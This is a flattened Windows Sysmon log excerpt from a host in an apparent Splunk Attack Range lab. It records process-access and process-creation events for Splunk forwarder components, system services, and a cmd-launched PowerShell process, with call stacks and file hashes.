Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000179953Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:37.060{29E67E80-D420-601A-3330-00000000A301}10286572C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{29E67E80-7D64-6019-B000-00000000A301}1160C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179979Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:38.872{29E67E80-7D64-6019-B400-00000000A301}16482392C:\Windows\system32\conhost.exe{29E67E80-D422-601A-3630-00000000A301}868C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179978Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:38.872{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179977Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:38.872{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179976Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:38.872{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179975Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:38.872{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179974Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:38.872{29E67E80-7CBD-6019-0500-00000000A301}640656C:\Windows\system32\csrss.exe{29E67E80-D422-601A-3630-00000000A301}868C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000179973Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:38.872{29E67E80-7D64-6019-B000-00000000A301}11603872C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{29E67E80-D422-601A-3630-00000000A301}868C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000179972Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:38.873{29E67E80-D422-601A-3630-00000000A301}868C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{29E67E80-7CBD-6019-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{29E67E80-7D64-6019-B000-00000000A301}1160C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000179971Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:38.357{29E67E80-D422-601A-3530-00000000A301}41324616C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{29E67E80-7D64-6019-B000-00000000A301}1160C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179970Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:38.201{29E67E80-7D64-6019-B400-00000000A301}16482392C:\Windows\system32\conhost.exe{29E67E80-D422-601A-3530-00000000A301}4132C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179969Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:38.201{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179968Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:38.201{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179967Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:38.201{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179966Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:38.201{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179965Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:38.201{29E67E80-7CBD-6019-0500-00000000A301}6402196C:\Windows\system32\csrss.exe{29E67E80-D422-601A-3530-00000000A301}4132C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000179964Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:38.201{29E67E80-7D64-6019-B000-00000000A301}11603872C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{29E67E80-D422-601A-3530-00000000A301}4132C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000179963Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:38.201{29E67E80-D422-601A-3530-00000000A301}4132C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{29E67E80-7CBD-6019-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{29E67E80-7D64-6019-B000-00000000A301}1160C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000180006Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:54.622{29E67E80-859E-6019-7105-00000000A301}53601944C:\Windows\system32\conhost.exe{29E67E80-D432-601A-3930-00000000A301}6516C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180005Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:54.622{29E67E80-859E-6019-7005-00000000A301}41846780C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{29E67E80-D432-601A-3930-00000000A301}6516C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3ed3|UNKNOWN(00007FFACE881C43) 10341000x8000000000000000180004Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:54.622{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180003Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:54.622{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180002Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:54.622{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180001Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:54.622{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180000Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:54.606{29E67E80-84F4-6019-2C05-00000000A301}19284632C:\Windows\system32\csrss.exe{29E67E80-D432-601A-3930-00000000A301}6516C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000179999Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:54.606{29E67E80-859E-6019-7005-00000000A301}41846780C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{29E67E80-D432-601A-3930-00000000A301}6516C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\f170745c571d606b4c8c92644c7c13d7\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\f170745c571d606b4c8c92644c7c13d7\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\f170745c571d606b4c8c92644c7c13d7\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\f170745c571d606b4c8c92644c7c13d7\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b3746(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b35ba(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+13635de6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135ac1a2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+14065395(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+1357499a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135d2e69(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b64ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b64ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b64ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b64ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b64ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b64ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b635f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135a82e4